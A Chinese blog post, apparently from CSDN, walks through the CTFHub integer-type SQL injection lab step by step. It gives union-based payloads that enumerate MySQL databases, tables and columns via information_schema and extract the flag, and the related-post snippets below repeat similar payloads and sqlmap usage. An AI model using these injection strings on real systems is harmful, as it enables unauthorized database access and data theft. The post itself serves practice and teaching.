CTFHub-sql注入-整数型注入

最新推荐文章于 2024-06-07 08:30:00 发布
最新推荐文章于 2024-06-07 08:30:00 发布
阅读量892 收藏 8
点赞数 2
分类专栏: CTFHub 文章标签: sql 数据库 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54537919/article/details/125933691
版权

sql注入

Mysql表类型:在mysql内自带一个数据库,名为information_schema,在这个数据库内

  • schemata,包含了所有的数据库名字
  • tables,包含了所有数据库表
  • columns,包含了所有字段
  • column_name:列的名称
  • Information_schema.columns:表示所有的列的信息
  • Information_schema:表示所有信息,包括库、表、列
  • Information_schema.tables:表示所有的表的信息
  • table_schema:数据库的名称
  • table_name:表的名称

**整数型注入

1.判断是否存在注入

在这里插入图片描述

证明存在注入

2.输入1,回显有两列。
在这里插入图片描述

3.猜解SQL查询语句中的字段数

在这里插入图片描述

发现这里报错了,当id=1 order by 2时,页面返回与id=1相同的结果;而id=1 order by 3时不一样,故字段数量是2。

4.确定显示位置/字段顺序/回显位/SQL语句插入位置

在这里插入图片描述

此时要先保证之前的数据查不出来,之后再union。id=-1数据不存在数据库中。可以看到位置2可以插入SQL语句。

5.获取数据库库名

(1)获取当前数据库库名和版本

在这里插入图片描述

得到数据库名称为:sqli,由数据库版本可知他是MySQL的一个分支

(2)获取所有数据库库名

-1 union select 1,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述

6.获取数据库表名

(1)方法一:一次获取一个表名

-1 union select 1,(select table_name from information_schema.tables where table_schema=‘sqli’ limit 0,1)

在这里插入图片描述

得到数据库表名:flag。修改limit中第一个数字,如获取第二个表名:limit 1,1,这样就可以获取所有的表名。

-1 union select 1,(select table_name from information_schema.tables where table_schema=‘sqli’ limit 1,1)

在这里插入图片描述

得到数据库表名:news

(2)方法二:一次性获取当前数据库所有表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’

在这里插入图片描述

得到数据库sqli中的表名为news和flag

7.获取表中的字段名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’

在这里插入图片描述

8.获取数据

-1 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述

瑶~why
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1040
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库: -1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 384
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1239
整型SQL注入
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2269
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHUB-SQL注入-整数型注入
最新发布
weixin_68416970的博客
06-07 559
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。使用 id=1' and 1 = 1 和 id=1' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。然后第一步先判断字段数量,然后查看数据库名,接着查看全部数据库名,查看这些数据库的表名,发现一个表名为 flag。查看这个表的全部字段后接着查看表中的数据得到此题 flag。
CTFHub 整数型SQL注入
Leon~博客
03-08 5660
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
php登录页面实现-SQL注入
03-07
然而,如果不正确地处理用户输入,登录页面可能会遭受SQL注入攻击。下面将详细讨论PHP登录页面实现及其与SQL注入的相关知识点。 1. PHP登录页面基础: - `conn.php`:这个文件通常包含数据库连接代码,使用PHP的`...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
asp源码-sql注入演示源码.zip
01-03
ASP源码与SQL注入演示源码是一套用于教学和安全测试的代码库,它展示了如何在ASP(Active Server Pages)环境中构建应用,并且包含了常见的安全漏洞,如SQL注入和XSS(跨站脚本攻击)。这个压缩包是针对那些希望学习...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2461
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2214
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
ctfhubsql整数型注入
hyhyxyx的博客
07-25 266
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 404
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB|SQL注入sqlmap)
m0_60651303的博客
07-14 1172
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFhub-sql-整数注入
ssss39的博客
08-21 488
因为 1=1 为真,1=2 为假,且 1=1 与 1 显示的数据一样,那么就存在 sqli 注入
ctfhub-sql注入
qq_45751902的博客
04-07 1849
整数型注入 行数 1 order by 2 数据库名 -1 union select 1,database() -- 一开始我在后面加上+,但是这个+是在url才可以被当作空格,有点傻了 表名 -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- 字段 -1 union select 1,group_concat(column_name) fro
sqli-labs实验指导手册
11-17
本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

瑶~why

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值